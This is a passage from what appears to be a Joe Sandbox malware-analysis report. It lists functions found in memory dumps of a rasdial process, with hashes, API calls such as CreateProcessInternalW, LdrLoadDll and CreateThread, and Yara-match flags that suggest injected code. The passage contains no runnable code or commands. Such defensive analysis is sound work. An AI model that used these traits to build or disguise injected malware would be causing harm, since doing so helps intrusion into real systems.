                                                      • Opcode Fuzzy Hash: a83202cee6aafd8d2b4fe2b9997bbb0e41cc4efc265195b8c0a2fe32a735315c
                                                      • Instruction Fuzzy Hash: 4890026220180403F140755848086071005CBD0306F55C061A216555AE8A29DD526135
                                                      Function 04B62FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 881c815cc246be7e2d4d80fdbe7ed72cc2d32d5d38c5822f7d85047d8338c8bc
                                                      • Instruction ID: 7517e5d39a61bd48caefee4ca91effc6b43b09d8be3bae67bd1e195a161190c3
                                                      • Opcode Fuzzy Hash: 881c815cc246be7e2d4d80fdbe7ed72cc2d32d5d38c5822f7d85047d8338c8bc
                                                      • Instruction Fuzzy Hash: 5D900222601400426140716888489065005EFE1215755C171A0A99555D8559D9665665
                                                      Function 04B62FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b26e01b0c3fd2e0286e65f6a3419e5173cffe0ab03d47b00c453bc0dbf5eaf12
                                                      • Instruction ID: d2bf7fb845b31c9602a457b72a1aaa135507c30a8ab0820491a306798953d3fd
                                                      • Opcode Fuzzy Hash: b26e01b0c3fd2e0286e65f6a3419e5173cffe0ab03d47b00c453bc0dbf5eaf12
                                                      • Instruction Fuzzy Hash: BC900222211C0042F20075684C18B071005CBD0307F55C165A0255559CC915D9625521
                                                      Function 04B62F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ce573774409dd4fe8b26b6d65d0811e2acc7f4a967f5846bcfd1641124ae78ff
                                                      • Instruction ID: 606a3fcbdea062cdf8063f5fdea2a263e19a7a4f6e5b50b026a716f0365c2d10
                                                      • Opcode Fuzzy Hash: ce573774409dd4fe8b26b6d65d0811e2acc7f4a967f5846bcfd1641124ae78ff
                                                      • Instruction Fuzzy Hash: 3190026234140442F10071584418B061005CBE1305F55C065E1165559D8619DD536126
                                                      Function 04B62AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2d808c120ff32cc327e4c033f359af6a894a0350c6fc640d750c2cbd2c730d5a
                                                      • Instruction ID: 7b772e16aa4f47b67c7ea5515ddb583a5a84d4ab74e1a0365d5f4211af7f46a7
                                                      • Opcode Fuzzy Hash: 2d808c120ff32cc327e4c033f359af6a894a0350c6fc640d750c2cbd2c730d5a
                                                      • Instruction Fuzzy Hash: 71900226221400022145B558060850B1445DBD6355395C065F1517595CC621D9665321
                                                      Function 04B62AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 517289ae1bd15b5b5ce9c5922fdf885d1709557bf7e8755e6b48a79afe50b9bf
                                                      • Instruction ID: e131d752bacf726f9ab5299755db4be0cc81516de0a3c9fa7a1b5f4c8151fb90
                                                      • Opcode Fuzzy Hash: 517289ae1bd15b5b5ce9c5922fdf885d1709557bf7e8755e6b48a79afe50b9bf
                                                      • Instruction Fuzzy Hash: 70900437311400033105F55C070C5071047CFD5355355C071F1117555CD731DD735131
                                                      Function 04B62BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e36d4c38e003f7d381a2942e23e8d0b5a237ee44288f910b7eccf4d6f612a2b4
                                                      • Instruction ID: 9edec020f776c6d8f8d207a39df2c8b63e07a76c542ed9c8a4b5d7b39bd959cf
                                                      • Opcode Fuzzy Hash: e36d4c38e003f7d381a2942e23e8d0b5a237ee44288f910b7eccf4d6f612a2b4
                                                      • Instruction Fuzzy Hash: 5D90023260540802F150715844187461005CBD0305F55C061A0125659D8755DB5676A1
                                                      Function 04B62BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d9a73958f040c0f684d5e51c5d3a1dad04c928c8955bb4ee97e2a9485f756e81
                                                      • Instruction ID: 9317ff8ef68986a56ee28830ac68efb0780dc8c54988dd96a106f82147fa9f74
                                                      • Opcode Fuzzy Hash: d9a73958f040c0f684d5e51c5d3a1dad04c928c8955bb4ee97e2a9485f756e81
                                                      • Instruction Fuzzy Hash: D390023220140802F1807158440864A1005CBD1305F95C065A0126659DCA15DB5A77A1
                                                      Function 04B62BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 35ce68d57e5615c82c711194e4e7c582fcbc117328864a909fcaaf737d56b0ec
                                                      • Instruction ID: ee2934f0ee6fe8df33acce12c1535c291607ba5d52d829c5cd8546b18e519a2f
                                                      • Opcode Fuzzy Hash: 35ce68d57e5615c82c711194e4e7c582fcbc117328864a909fcaaf737d56b0ec
                                                      • Instruction Fuzzy Hash: 0B90023220544842F14071584408A461015CBD0309F55C061A0165699D9625DE56B661
                                                      Function 04B62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1c55ee09056277441d4b4e7f177bb6b4e23786ca47be5af3b943bfe91e9ea00a
                                                      • Instruction ID: c8558bdc14d58b78a16d41bdcf362b168f2d42f963259752567f40b25a8af167
                                                      • Opcode Fuzzy Hash: 1c55ee09056277441d4b4e7f177bb6b4e23786ca47be5af3b943bfe91e9ea00a
                                                      • Instruction Fuzzy Hash: 8990026220240003610571584418616500ACBE0205B55C071E1115595DC525D9926125
                                                      Function 04B635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a48cb7fb26b66c9872ee935b43386103bb12261ed39f7802a0fae4b1a2f30aa0
                                                      • Instruction ID: b5d5b0fdcc227036a42405207f42d7302b86bfec0b130344f0e3c87496eb173e
                                                      • Opcode Fuzzy Hash: a48cb7fb26b66c9872ee935b43386103bb12261ed39f7802a0fae4b1a2f30aa0
                                                      • Instruction Fuzzy Hash: 1D90023260550402F100715845187062005CBD0205F65C461A052556DD8795DA5265A2
                                                      Function 04B639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4801e218ff73bc586580b454dbc076115f20cbfa240f030c4d0da7623a33093b
                                                      • Instruction ID: cad904df220df283e187d5fd0ef013be81a7e7eacaa571789dfffd33d5498c7b
                                                      • Opcode Fuzzy Hash: 4801e218ff73bc586580b454dbc076115f20cbfa240f030c4d0da7623a33093b
                                                      • Instruction Fuzzy Hash: B490022224545102F150715C44086165005EBE0205F55C071A0915599D8555D9566221
                                                      Function 02C634F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 02C635BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: cb1bee77de7e6addf56677105ffe8a9ddc40c3b2228cf65e4303965812760a85
                                                      • Instruction ID: 55ade824e9ce60ccb8b393624ee7d55e4eb713be79a9c4c3e8b9f95be4f5220b
                                                      • Opcode Fuzzy Hash: cb1bee77de7e6addf56677105ffe8a9ddc40c3b2228cf65e4303965812760a85
                                                      • Instruction Fuzzy Hash: 2F31BCB1600205BBDB14DFA4C8C4FFBBBB9FF88714F544018EA59AB240C770A640CBA5
                                                      Function 02C5EEFA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 011d672e5543e3db47c0c153c4695aad8b81cb8947645e4878a19fbbf52d4869
                                                      • Instruction ID: b975321ec84d1c8aa35d9638f8bb9fe82230dde2732368104bf2180f39b6b593
                                                      • Opcode Fuzzy Hash: 011d672e5543e3db47c0c153c4695aad8b81cb8947645e4878a19fbbf52d4869
                                                      • Instruction Fuzzy Hash: 193121B5A0060A9FDB10DFD8C8809EFB7B9BF88304F108559E915E7254D775EE458BA0
                                                      Function 02C5EF00 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 41f43cebcabf5616faa043f6ed83239c813c17aa1f39eb39fe1040b52d41743f
                                                      • Instruction ID: da234e2f4284de2d53bba7130c6ec2dfa3b2da0739242d486edfb4a4cdbdc491
                                                      • Opcode Fuzzy Hash: 41f43cebcabf5616faa043f6ed83239c813c17aa1f39eb39fe1040b52d41743f
                                                      • Instruction Fuzzy Hash: 523130B5A0060A9FDB10DFD8C8809EFB7B9BF88304F108559E915EB254DB75EE45CBA0
                                                      Function 02C53F30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C53FA2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction ID: 8eaf6f5563c11e96b31d32def3511a7a9419b82eb13da66e7b94ddf2c12e199c
                                                      • Opcode Fuzzy Hash: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction Fuzzy Hash: E5011EB5D0020DABDB10EAE4DC85FADB7799B94308F0042D5AD18A7241F671EB58DB91
                                                      Function 02C691E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C57D1E,00000010,?,?,?,00000044,?,00000010,02C57D1E,?,?,?), ref: 02C69240
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 2f6ac9e8aaa5c724821357bd286b7ac54767ad4f1283a8855f4653ad494c20a0
                                                      • Instruction ID: 700b3e8c7f1f6426aa9df777123c3036054d9cf57731e0dfb57b431fa9d64c48
                                                      • Opcode Fuzzy Hash: 2f6ac9e8aaa5c724821357bd286b7ac54767ad4f1283a8855f4653ad494c20a0
                                                      • Instruction Fuzzy Hash: CF01C0B2204248BBCB54DE89DC90EEB77EEAF8C754F408108BA09E3240D630FC518BA4
                                                      Function 02C53FEC Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4b94c2314521d8f25ea77e2c4b1031aa999e68fa5996bdd45285a49d38e8a29
                                                      • Instruction ID: 18f04922592f2d3ebaf95dc29eb3815f624922b094c6660ac2ea2f02c73d0924
                                                      • Opcode Fuzzy Hash: c4b94c2314521d8f25ea77e2c4b1031aa999e68fa5996bdd45285a49d38e8a29
                                                      • Instruction Fuzzy Hash: F001F975D406499BE700CFA8D844FAAB7B6EB48304F0046DADD1587210FB31E686CB81
                                                      Function 02C499A0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C499E5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 16c0e71b6372fec22eebbbca97e89183367efa31272dd7e647b078886704f17d
                                                      • Instruction ID: f9d1b143bfe20287400c0168a74d08cffa06beed066ff394cfc129242ad7885a
                                                      • Opcode Fuzzy Hash: 16c0e71b6372fec22eebbbca97e89183367efa31272dd7e647b078886704f17d
                                                      • Instruction Fuzzy Hash: 3DF0653338031436D22066A99C46FDBB75DCB817A5F140025F70CDB1C0D9A1B54156A5
                                                      Function 02C4999A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C499E5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 466464831a6234b5cf27503d40ed54007358e1f93d1157a7e47aaa5bfc18c748
                                                      • Instruction ID: 8d07590f02dd74463ba546ac535e6c541158b04011f8eadb3dba2278d672a16a
                                                      • Opcode Fuzzy Hash: 466464831a6234b5cf27503d40ed54007358e1f93d1157a7e47aaa5bfc18c748
                                                      • Instruction Fuzzy Hash: F6F0E53374021435D23166A58C46FEBB76DCF80754F240018F64DAB1C0CEA1B901D6B5
                                                      Function 02C69150 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0010FC45,00000007,00000000,00000004,00000000,02C537B9,000000F4), ref: 02C6918F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 21a887275888f9565f0d5c27f43f3595d2ce9c6cf8850c99fe8b9620a2e14d34
                                                      • Instruction ID: 579af9933cc1d176e88c552722df39c748f7e04215fe521b57244bb12464e33b
                                                      • Opcode Fuzzy Hash: 21a887275888f9565f0d5c27f43f3595d2ce9c6cf8850c99fe8b9620a2e14d34
                                                      • Instruction Fuzzy Hash: 30E065722042047FDA14EE58DC44FAB33ADEF89710F004018FA08A7241CA70B9108AB5
                                                      Function 02C69100 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(02C51409,?,02C6523B,02C51409,02C650DF,02C6523B,?,02C51409,02C650DF,00001000,?,?,00000000), ref: 02C6913F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction ID: 77c0a1aa494f186f747a8067cb1e90b6d9f5f071415b1e178f5f0894fa96fab2
                                                      • Opcode Fuzzy Hash: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction Fuzzy Hash: CCE06D712042057FCA10EE58DC40FAB37ADDFC9750F004018F948A7241CA71BD108BB5
                                                      Function 02C57D59 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02C57D8C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 090edafa64fe55acc956f56fece31b4b26d8c8772244cee9ae27d04153aeb1be
                                                      • Instruction ID: ecc3bb640632a9f39106b7cfd5ecc3e9b3dc6470386126669592378585b9e1f1
                                                      • Opcode Fuzzy Hash: 090edafa64fe55acc956f56fece31b4b26d8c8772244cee9ae27d04153aeb1be
                                                      • Instruction Fuzzy Hash: C8E0D87724021426E72456688C45BB533198B89368F284610BC18DB2C2D379D6814550
                                                      Function 02C57D60 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02C57D8C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: aa715be84dc1786330d8e3a9c19bbb14877f2b2f3bc9f7616327c753a0cfc76d
                                                      • Instruction ID: 8d2ddea03a612d072a453d1eaa58d406b67858a83c8a1c114fd60f2a148852cd
                                                      • Opcode Fuzzy Hash: aa715be84dc1786330d8e3a9c19bbb14877f2b2f3bc9f7616327c753a0cfc76d
                                                      • Instruction Fuzzy Hash: 3DE0867624031827EB246AA8DC45FB6335C8B8872CF684A60BD1CDB2C2E778F6814154
                                                      Function 02C57B49 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02C51700,02C67A1F,02C650DF,02C516CD), ref: 02C57B83
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: a36f65924d5303618baab4b895ecc6f000d867d55bb0d249c79d78fb677258df
                                                      • Instruction ID: c92b2569be6157e53de21c61155ae9cb51344d0f8d4fc9478a1b190850488140
                                                      • Opcode Fuzzy Hash: a36f65924d5303618baab4b895ecc6f000d867d55bb0d249c79d78fb677258df
                                                      • Instruction Fuzzy Hash: CBE0C2B5B802102EE340ABF08C55FA63B498B84758F0980A4B54CDB2C3DAA1D1024A65
                                                      Function 02C57B50 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02C51700,02C67A1F,02C650DF,02C516CD), ref: 02C57B83
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
